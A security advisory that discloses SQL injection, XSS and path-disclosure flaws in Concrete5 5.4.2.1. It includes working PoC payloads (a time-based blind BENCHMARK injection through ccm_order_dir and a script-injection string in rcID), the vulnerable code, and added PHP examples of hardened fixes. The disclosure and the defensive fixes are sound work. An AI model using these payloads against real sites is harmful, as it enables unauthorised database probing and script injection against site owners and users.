# Exploit Title: Concrete5 <= 5.4.2.1 SQL Injection and XSS Vulnerabilities
# Date: 2011-10-04
# Published: ☠Cantuaria (http://brzu.net/0h3)
# Author: Ryan Dewhurst
# Software Link: http://sourceforge.net/projects/concretecms/files/concrete5/5.4.2.1/
# Version: 5.4.2.1 (tested)
1. Vulnerability Description

Multiple SQL Injection, Cross-Site Scripting (XSS) and Information
Disclosure vulnerabilities were identified within Concrete5 version
5.4.2.1.

Please note: only a select few vulnerabilities are outlined in this
disclosure; many other vulnerabilities were discovered. Due to time
constraints only a small sample of the vulnerabilities are outlined
below. The vendor was contacted and replied promptly. Further assistance
was asked for but not delivered due to my time constraints.
2. Software Description

CMS made for Marketing but built for Geeks: concrete5 [0] is a content
management system that is free and open source.
3. SQLi PoC [1] (authenticated user)

http://concrete5.4.2/index.php/dashboard/reports/surveys/?ccm_order_by=numberOfResponses&ccm_order_dir=,(SELECT BENCHMARK(1000000,MD5(1)) FROM btSurveyResults WHERE CURRENT_USER() LIKE 'root@localhost' LIMIT 1) --

The injection point is the ccm_order_dir sort-direction parameter, which
is appended to the ORDER BY clause unfiltered (ccm_order_by itself is
limited to the whitelisted columns shown in the code below). The
BENCHMARK() call makes this a time-based blind test: the response is
delayed only when the WHERE condition holds, here when the database
connection runs as root@localhost.
4. Vulnerable Code

File: concrete/controllers/dashboard/reports/surveys.php

class SurveyList extends DatabaseItemList {
    protected $itemsPerPage = 10;
    // Whitelist applied to ccm_order_by only; the ccm_order_dir value used
    // in the PoC above is not restricted to asc/desc anywhere in this class.
    protected $autoSortColumns = array('cvName', 'question',
        'numberOfResponses', 'lastResponse');

    function __construct() {
        $this->setQuery(
            'select distinct btSurvey.bID, CollectionVersions.cID,
             btSurvey.question, CollectionVersions.cvName,
             (select max(timestamp) from btSurveyResults
                where btSurveyResults.bID = btSurvey.bID
                  and btSurveyResults.cID = CollectionVersions.cID) as lastResponse,
             (select count(timestamp) from btSurveyResults
                where btSurveyResults.bID = btSurvey.bID
                  and btSurveyResults.cID = CollectionVersions.cID) as numberOfResponses ' .
            'from btSurvey, CollectionVersions, CollectionVersionBlocks');
        $this->filter(false, 'btSurvey.bID = CollectionVersionBlocks.bID');
        $this->filter(false, 'CollectionVersions.cID = CollectionVersionBlocks.cID');
        $this->filter(false, 'CollectionVersionBlocks.cvID = CollectionVersionBlocks.cvID');
        $this->filter(false, 'CollectionVersions.cvIsApproved = 1');
        $this->userPostQuery .= 'group by btSurvey.bID, CollectionVersions.cID';
    }
}
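The following is an added example, not concrete5 code, written to show how the SurveyList class above and the PoC in section 3 fit together: a minimal stand-in for a list class that turns ccm_order_by / ccm_order_dir into an ORDER BY clause, with the PoC query string fed through an unchecked version and a checked one. The function names, BASE_QUERY and the way the direction is concatenated are assumptions made for illustration; the real DatabaseItemList is not reproduced here.

```php
<?php
// Added example, not concrete5 code. buildOrderByVulnerable(),
// buildOrderBySafe() and BASE_QUERY are illustrative names; the real
// DatabaseItemList is assumed to concatenate the direction in a similar way.

const AUTO_SORT_COLUMNS = array('cvName', 'question', 'numberOfResponses', 'lastResponse');
const BASE_QUERY = 'select distinct btSurvey.bID, btSurvey.question from btSurvey';

// Vulnerable pattern: the column is checked against the whitelist, but the
// direction string is concatenated into the SQL untouched.
function buildOrderByVulnerable(array $get)
{
    $col = isset($get['ccm_order_by']) ? $get['ccm_order_by'] : 'cvName';
    $dir = isset($get['ccm_order_dir']) ? $get['ccm_order_dir'] : 'asc';
    if (!in_array($col, AUTO_SORT_COLUMNS, true)) {
        $col = 'cvName';
    }
    return BASE_QUERY . ' order by ' . $col . ' ' . $dir;
}

// Hardened pattern: both parts of the clause must come from a fixed set;
// nothing taken from the request is ever concatenated into the SQL.
function buildOrderBySafe(array $get)
{
    $col = isset($get['ccm_order_by']) ? $get['ccm_order_by'] : 'cvName';
    $dir = isset($get['ccm_order_dir']) ? strtolower($get['ccm_order_dir']) : 'asc';
    if (!in_array($col, AUTO_SORT_COLUMNS, true)) {
        throw new InvalidArgumentException('invalid sort column: ' . $col);
    }
    if ($dir !== 'asc' && $dir !== 'desc') {
        throw new InvalidArgumentException('invalid sort direction');
    }
    return BASE_QUERY . ' order by ' . $col . ' ' . $dir;
}

// Constructed request, equivalent to the query string of the PoC URL.
$poc = array(
    'ccm_order_by'  => 'numberOfResponses',
    'ccm_order_dir' => ",(SELECT BENCHMARK(1000000,MD5(1)) FROM btSurveyResults"
                     . " WHERE CURRENT_USER() LIKE 'root@localhost' LIMIT 1) --",
);

// The whitelist passes numberOfResponses, so the payload becomes a second
// ORDER BY expression: MySQL evaluates the subquery and BENCHMARK() runs
// only when the WHERE condition holds, which is what turns the response
// delay into a blind oracle. The trailing "--" comments out whatever the
// list class appends after the direction (e.g. a LIMIT clause).
echo buildOrderByVulnerable($poc), PHP_EOL;

// The same request is rejected before any SQL is built.
try {
    buildOrderBySafe($poc);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate request still works; the direction is matched case-insensitively.
echo buildOrderBySafe(array('ccm_order_by' => 'lastResponse', 'ccm_order_dir' => 'DESC')), PHP_EOL;
```

The design point is that ORDER BY columns and directions cannot be bound as prepared-statement parameters, so the only safe construction is to map request values onto fixed identifiers and refuse (or default) anything else; escaping the string would not help here because no quoting is involved.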
5. Cross-Site Scripting (XSS)

Page: http://192.168.1.105/concrete5.4.2/index.php/login/forgot_password/
Parameter: rcID
Method: POST
PoC: "><script>alert(1)</script>
6. Vulnerable Code

File: concrete/single_pages/login.php:

<input type="hidden" name="rcID" value="<?php echo $rcID?>" />

$rcID is written into the attribute value without HTML encoding, so the
double quote in the PoC closes the attribute and the remainder of the
POSTed value is parsed as markup.
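The following is an added example, not concrete5 code: the hidden-field line from login.php rendered with the PoC payload from section 5, beside two hardened versions. The render*() function names are illustrative, and the assumption that rcID only ever carries a numeric collection ID is mine, not something the advisory states.

```php
<?php
// Added example, not concrete5 code. The render*() names are illustrative;
// treating rcID as a numeric ID in renderHiddenTyped() is an assumption.

const POC = '"><script>alert(1)</script>';

// Vulnerable: the same logic as the template line. The first '"' in the
// payload closes the value attribute, '>' closes the <input> tag, and the
// <script> element that follows is parsed by the browser as markup.
function renderHiddenVulnerable($rcID)
{
    return '<input type="hidden" name="rcID" value="' . $rcID . '" />';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES turns both
// '"' and "'" into entities, so no value can terminate the attribute
// regardless of which quote style the template uses.
function renderHiddenEscaped($rcID)
{
    return '<input type="hidden" name="rcID" value="'
        . htmlspecialchars($rcID, ENT_QUOTES, 'UTF-8') . '" />';
}

// Stricter: if the field only ever carries a collection ID, validate the
// type instead of encoding arbitrary text. Non-numeric input collapses to
// an integer, which removes the injection surface entirely.
function renderHiddenTyped($rcID)
{
    return '<input type="hidden" name="rcID" value="' . (int) $rcID . '" />';
}

echo renderHiddenVulnerable(POC), PHP_EOL;  // payload breaks out of the attribute
echo renderHiddenEscaped(POC), PHP_EOL;     // payload stays inside value="..."
echo renderHiddenTyped(POC), PHP_EOL;       // only an integer is emitted
```

Encoding at the point of output (the htmlspecialchars() call) is the general fix because it works for any value; the integer cast is the right choice only where the field's meaning is genuinely numeric, and it also has the side effect of keeping a stray quote out of any query that later uses the ID.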
7. Full Path Disclosure (FPD)

http://concrete5.4.2/index.php/tools/blocks/page_list/blog_rss?bID=30&cID='&arHandle=Main

The single quote in cID provokes an error whose message reveals the
filesystem path of the installation.
8. Vulnerability Timeline

2011-09-06 - Reported to vendor
2011-09-06 - Vendor reply
2011-09-07 - Vendor acknowledged the vulnerabilities and asked for
assistance patching. No assistance given apart from the initial report,
due to time constraints.
2011-10-04 - Vulnerability disclosed
9. References

[0] http://www.concrete5.org/
[1] http://www.bonsai-sec.com/blog/index.php/not-the-average-sql-injection/